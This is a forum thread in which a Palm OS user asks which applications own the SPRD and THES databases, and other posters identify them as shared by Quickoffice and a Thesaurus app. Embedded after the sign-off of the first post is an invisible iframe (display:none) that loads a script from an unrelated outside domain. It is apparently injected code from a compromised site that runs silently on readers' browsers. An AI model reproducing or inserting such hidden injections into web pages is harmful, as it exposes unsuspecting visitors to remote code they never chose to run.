    Database Association

I have two databases in my phone and I don't know which programs they go with, SPRD and THES. Two questions: (1) Does someone know what these belong to? and (2) Is there a way to figure out which program they are associated with for future reference?

    Thanks,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can use Filez to list all databases (including apps), and sort by creator ID. If the programs have been deleted by some other means other than with the launcher, you're probably out of luck.

A check for those creator IDs at http://dev.palmos.com/creatorid/ do show that they are registered, but don't list the app name.

Of course there are other ways, like searching in your palm desktop's archive folder... but I'm not sure if the standard windows text search will find binary files.

Thanks, I'll look a little further. I think they might be the spelling and thesaurus associated with Quick Office which I deleted because I couldn't get the PC component to work. It always gave me some Active X error when I tried to add a Word or Excel document. I went back to Docs-To-Go.

Yep. Those DBs are also used by the "Thesaurus" application. Quickoffice and Thesaurus share these same large databases. I wish more developers were able to collaborate this way.
